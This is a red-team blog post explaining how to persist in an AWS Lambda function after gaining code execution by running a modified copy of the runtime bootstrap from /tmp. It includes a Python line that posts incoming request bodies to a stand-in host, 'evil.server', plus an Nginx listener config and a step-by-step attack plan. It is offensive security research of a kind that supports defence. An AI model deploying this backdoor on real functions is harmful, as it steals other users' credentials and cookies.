Revisiting Lambda Persistence

September 16, 2021

As an attacker, Serverless environments are a very different target when compared with their traditional server-based counterparts. Even gaining remote code execution, which would normally spur a race to escalate privileges, has a very different connotation. This is not to say that Serverless is “unhackable”, it just has a reduced (and very different) attack surface. Commonly, attackers know if they can uncover a vulnerability that allows them to read arbitrary files, they can leak the IAM credentials associated with the Lambda function. But what else can you do?

As a Penetration Tester or Red Teamer, there is a much greater focus on the code running in the Lambda function, and any potential vulnerabilities it may have. So what happens when that function deserializes something it shouldn’t? Injects the wrong command? Has external libraries with severe vulnerabilities? Maybe someone thought it was a great idea to eval user supplied input? Remote code execution vulnerabilities are an awesome thing to find, but how can you capitalize on them in the world of Serverless?

Thanks to some excellent research by Yuval Avrahami of Palo Alto’s Unit 42 we have an answer. He identified a technique to swap a Lambda function’s runtime during execution. This allows you to intercept incoming requests that other users are making. If that Lambda function is a user-facing web application or API with an API Gateway in front, we can potentially intercept credentials, cookies, or other valuable information.

If you have not already, I would highly encourage you to read the original research. While I will be summarizing parts of it, I certainly won’t be doing it justice.

With this article, I’d like to streamline some of the original research and expand upon the technique for use in more diverse runtimes. Since the original post used the Python runtime as an example, I will do that here too. Other runtimes may require subtle changes, but will overall adhear to the same ideas.

Looking for a step by step example of how to leverage this technique? Check out the Lambda Persistence page on Hacking The Cloud.

How Does a Lambda Function Work?

When it comes to Lambda functions, everything starts with the execution environment. This is what manages the function lifecycle and resources. Inside this environment is where the various runtimes (including custom ones) are executed.

When the function starts up, it will go through an Init phase, where it will startup the various extensions (if there are any), and bootstrap the runtime. This typically looks like a “bootstrap.*extension*” file in /var/runtime/. This code will query the Runtime API looking for new events. When it receives an event, it Invokes it and returns the results to the Runtime API.

What is important to note, is that this environment can be reused between function invocations. As such, this presents us an opportunity. If an execution environment is reused, we have the potential to persist in the function itself. This persistency would be very useful to intercept additional invocations as they come in.

How Do We Persist in the Function?

Now for the challenge, how do we go about persisting in a Lambda function? This was the premise of Yuval’s post. With code execution in the Lambda function, we can swap out the original bootstrap, with a custom one that we define.

In the Unit 42 post, the swapped bootstrap is a copy of the original, with some additional wrapper code to send incoming events to a third party (the attacker). You can see the proof of concept for this here. This is very effective, however, in this post I would like to highlight some potential improvements to the technique.

Getting the Request ID

In the original post, there were two methods for fetching the request ID, using the Python ‘inspect’ module or searching in memory for the bootstrap processes. Both of these methods are functional, however they have their limitations.

If we rely on the inspect module, then we can realistically only use this on the Python runtime. While Python is a very popular language, requiring a specific runtime makes this technique unreliable to say the least. Furthermore, could you imagine finding an RCE vulnerability in a Lambda function only for it to be written in JavaScript or Ruby? If you were to attempt to recreate the attack, you’d either be out of luck or you’d have to move on to the second option.

The second option as posed by Yuval would be to read it out of memory. This is fairly reliable, however it is slow, adding roughly 3-5 seconds on top of the attack. To be clear, it is a totally viable option (and I put together a PoC where this was the method for grabbing the request ID), but I think it’s fair to say we should look for a method which is faster and leverages built-in functionality.

Thankfully, I posed this question to Twitter and I am very fortunate to have followers who are much much smarter than I am. Alexander Klink pointed out that the Runtime API can provide this for you! (There is probably a lesson here for me about reading the docs prior to researching something)

With this new method in hand, we can now reliably fetch the request ID quickly and in a runtime independent manner. We can use this request ID to post to the Runtime API, claiming (illegitimately) that the function has ended. Now we need to execute the modified bootstrap process.

Changing Runtimes

Our next optimization comes in the swapping of the runtime’s bootstrap process. In the original technique, we would have to bring over an entire runtime that contains some wrapper code to functionally exploit it. While this is doable, it becomes a bit of a headache on different runtimes, as we will have to copy the original, wrap it, and then ship it. What about situations where the bootstrap code has changed, or its dependencies are altered?

A great example of this - the twist_runtime.py should no longer function as it attempts to leverage the packaged version of requests in the botocore library which has since been removed.

The solution to this is relatively simple, we can clone the existing bootstrap file from the existing lambda function (found in /var/runtime/bootstrap.py) and insert our exfiltration code. Due to the majority of the filesystem in the Lambda function being read-only, we can’t actually modify the bootstrap code that is executed, but what we can do is copy it to /tmp (which should have ample space) and execute it from there.

From an effort perspective, adding a few lines is much easier than adding all the additional wrapper logic, additionally posting to the Runtime API prior to executing the modified bootstrap process further makes things easier.

In terms of what you should be modifying, your goal will be to identify when the bootstrap gets the new event, and then post that data to an endpoint you control. This is an example of what will work for Python when inserted into bootstrap.py on line 465.

import urllib3
http = urllib3.PoolManager()
http.request('post', 'https://evil.server/post', body=event_request.event_body)

One aspect of this that should be noted is HOW you are modifying the bootstrap code. For testing, I have simply been executing Python code as a one-liner via -c to pull down the modified runtime from a webserver. However, if you are using something external like curl or wget, it is possible that tool wont be in the runtime. In these situations, you may need to get creative and explore what all exists on the host. For example, I came to find out that awk has the ability to make TCP connections and request content from a web server (with commentary from Scott Piper, Will Bengston, and thegrugq).

Another thing to consider is any tools you may need for code execution/payload grooming. For example, if you wanted to base64 encode a payload, you’d need a base64 binary in the runtime to decode it and pipe it to a shell. The good news is that base64 does exist in the Python runtime. Other runtimes may vary.

Creating a Listener

One additional aspect to the technique I did not see in the original writeup (unless I just missed it) was the listener piece. The exfiltrated data will need to go somewhere and you’ll need some way to manage it. For me, the solution to this was to modify a Nginx config so that it would log post data to a log file. I did that with the following config:

Setting the log_format outside of the server body: log_format postdata $request_body;

Then within the server body we set the following:

location = /post {
    access_log /var/log/nginx/postdata.log postdata;
    proxy_pass http://127.0.0.1/post_extra;
}
location = /post_extra {
    access_log off;
    return 200;
}

By doing this, you will have a shiny new log file in /var/log/nginx/postdata.log which will contain all the data you are posting to the /post endpoint.

Exploit the Lambda Function

If we assemble all of these parts together we have an efficient and streamlined attack to exfiltrate incoming events.

Step 1: Find an opportunity for RCE in a Lambda function
Step 2: Determine the runtime
Step 2 A: If it is custom, exfiltrate the bootstrap file
Step 2 B: If it is standard, go get a copy of the bootstrap file
Step 3: Introduce a backdoor in the bootstrap file to exfiltrate data
Step 4: Setup an Nginx listener
Step 5: Use the RCE to move the backdoored bootstrap file to the Lambda function and execute it
Step 6: Enjoy

Additional Considerations

There are some things we should keep in mind if we intend to execute this attack. First, is the idea of the cold vs warm Lambda. After 5-15 minutes of inactivity, the Execution Environment will go cold, and will be destroyed. This will destroy any type of persistency we have created. The solution to this, is to “warm” the Lambda, by sending new requests to keep it active.

The second consideration is scaling out the attack. If a Lambda function is particularly popular (i.e, tons of people are using it) then it is likely running many functions simultaneously. You could scale out your attack by executing these functions in parallel, further increasing the amount of events you can steal.

Final Thoughts

Developing attacks around Serverless applications is an interesting thought experiment. It is such a divergence from what is in the traditional “hacker handbook”, and it takes creative minds like Yuval and the folks at Unit 42 to come up with the next generation of attacks to leverage against these environments and applications. It was a ton of fun expanding on this work and streamlining the exploitation.